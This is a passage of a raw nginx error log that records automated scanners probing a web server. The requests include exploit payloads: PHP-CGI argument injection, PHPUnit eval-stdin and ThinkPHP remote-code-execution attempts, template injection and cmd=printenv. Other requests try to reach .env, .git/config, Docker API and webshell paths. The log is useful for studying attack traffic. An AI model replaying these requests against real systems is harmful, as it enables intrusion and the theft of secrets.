/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:00 [error] 208#208: *4753 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:05 [error] 208#208: *4753 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:11 [error] 208#208: *4753 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:16 [error] 208#208: *4753 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:21 [error] 208#208: *4753 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:25 [error] 208#208: *4753 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:31 [error] 208#208: *4753 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:37 [error] 208#208: *4753 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:39 [error] 208#208: *4753 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:41 [error] 208#208: *4753 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:46 [error] 208#208: *4753 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:50 [error] 208#208: *4753 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:52 [error] 208#208: *4753 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:41:57 [error] 208#208: *4753 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:02 [error] 208#208: *4753 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:04 [error] 208#208: *4753 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:05 [error] 208#208: *4753 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:06 [error] 208#208: *4753 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:06 [error] 208#208: *4753 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:07 [error] 208#208: *4753 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:10 [error] 208#208: *4753 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:14 [error] 208#208: *4753 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:17 [error] 208#208: *4753 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:19 [error] 208#208: *4753 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:25 [error] 208#208: *4753 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:31 [error] 208#208: *4753 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:37 [error] 208#208: *4753 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:44 [error] 208#208: *4753 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:51 [error] 208#208: *4753 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:54 [error] 208#208: *4753 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:42:58 [error] 208#208: *4753 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:02 [error] 208#208: *4753 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:03 [error] 208#208: *4753 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:08 [error] 208#208: *4753 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:09 [error] 208#208: *4753 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:11 [error] 208#208: *4753 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:11 [error] 208#208: *4753 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:13 [error] 208#208: *4753 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:13 [error] 208#208: *4753 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:43:22 [error] 208#208: *4753 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:45:10 [error] 222#222: *4759 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:04 [error] 222#222: *4764 open() "/var/www/html/index.php/module/action/param1/${@print(env)}" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /index.php/module/action/param1/$%7B@print%28env%29%7D HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:04 [error] 222#222: *4765 open() "/var/www/html/_ignition/health-check" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "POST /_ignition/health-check HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:04 [error] 222#222: *4766 open() "/var/www/html/_ignition/execute-solution" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "POST /_ignition/execute-solution HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:04 [error] 222#222: *4767 open() "/var/www/html/__debug__/execute" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /__debug__/execute?cmd=printenv HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:04 [error] 222#222: *4768 open() "/var/www/html/script" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /script HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:05 [error] 222#222: *4769 open() "/var/www/html/actuator/env" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /actuator/env HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:05 [error] 222#222: *4770 open() "/var/www/html/env" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:05 [error] 222#222: *4771 open() "/var/www/html/v2/api-docs" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /v2/api-docs HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:05 [error] 222#222: *4772 open() "/var/www/html/api-docs" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /api-docs HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:05 [error] 222#222: *4773 open() "/var/www/html/swagger.json" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /swagger.json HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:46:06 [error] 222#222: *4774 open() "/var/www/html/swagger/v1/swagger.json" failed (2: No such file or directory), client: 98.88.247.68, server: localhost-nginx-proxy-manager, request: "GET /swagger/v1/swagger.json HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:54:24 [error] 222#222: *4778 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 146.70.116.221, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/30 03:32:39 [error] 223#223: *4789 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 03:40:28 [error] 223#223: *4794 open() "/var/www/html/.env" failed (2: No such file or directory), client: 2.57.171.148, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/30 03:47:25 [error] 223#223: *4798 open() "/var/www/html/.env" failed (2: No such file or directory), client: 134.199.149.147, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/30 03:47:25 [error] 223#223: *4799 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 134.199.149.147, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/30 04:45:54 [error] 225#225: *4844 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:54 [error] 225#225: *4844 open() "/var/www/html/neshe.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /neshe.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:54 [error] 225#225: *4844 open() "/var/www/html/wp-site.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-site.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:54 [error] 225#225: *4844 open() "/var/www/html/environment.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /environment.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:55 [error] 225#225: *4844 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:55 [error] 225#225: *4844 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:55 [error] 225#225: *4844 open() "/var/www/html/tmpls.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /tmpls.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:55 [error] 225#225: *4844 open() "/var/www/html/wp-content/plugins/dummyyummy/wp-signup.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:56 [error] 225#225: *4844 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:56 [error] 225#225: *4844 open() "/var/www/html/test1.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /test1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:56 [error] 225#225: *4844 open() "/var/www/html/wp-themes.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-themes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:56 [error] 225#225: *4844 open() "/var/www/html/wp-includes/Text/about.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:57 [error] 225#225: *4844 open() "/var/www/html/indeex.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /indeex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:57 [error] 225#225: *4844 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:57 [error] 225#225: *4844 open() "/var/www/html/503.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /503.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:57 [error] 225#225: *4844 open() "/var/www/html/html.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /html.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:58 [error] 225#225: *4844 open() "/var/www/html/custom-background.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /custom-background.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:58 [error] 225#225: *4844 open() "/var/www/html/xmrlpc.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /xmrlpc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:58 [error] 225#225: *4844 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:58 [error] 225#225: *4844 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:59 [error] 225#225: *4844 open() "/var/www/html/css/radio.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /css/radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:59 [error] 225#225: *4844 open() "/var/www/html/cwclass.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET //cwclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:59 [error] 225#225: *4844 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:45:59 [error] 225#225: *4844 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:00 [error] 225#225: *4844 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:00 [error] 225#225: *4844 open() "/var/www/html/oo.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /oo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:00 [error] 225#225: *4844 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:00 [error] 225#225: *4844 open() "/var/www/html/wp-admin/images/admin.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:01 [error] 225#225: *4844 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:01 [error] 225#225: *4844 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:01 [error] 225#225: *4844 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:01 [error] 225#225: *4844 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:01 [error] 225#225: *4844 open() "/var/www/html/server.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /server.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:02 [error] 225#225: *4844 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:02 [error] 225#225: *4844 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:02 [error] 225#225: *4844 open() "/var/www/html/yanz.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /yanz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:02 [error] 225#225: *4844 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:03 [error] 225#225: *4844 open() "/var/www/html/wp-includes/images/wp-login.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:03 [error] 225#225: *4844 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:03 [error] 225#225: *4844 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /elp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:04 [error] 225#225: *4844 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /admin/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:04 [error] 225#225: *4844 open() "/var/www/html/sx.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /sx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:04 [error] 225#225: *4844 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:04 [error] 225#225: *4844 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:05 [error] 225#225: *4844 open() "/var/www/html/wp-admin/maint/admin.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:05 [error] 225#225: *4844 open() "/var/www/html/.well-known/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /.well-known/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:05 [error] 225#225: *4844 open() "/var/www/html/priv.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /priv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:05 [error] 225#225: *4844 open() "/var/www/html/function.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:06 [error] 225#225: *4844 open() "/var/www/html/wp-includes/js/codemirror/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/js/codemirror/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:06 [error] 225#225: *4844 open() "/var/www/html/wp-load.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-load.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:06 [error] 225#225: *4844 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 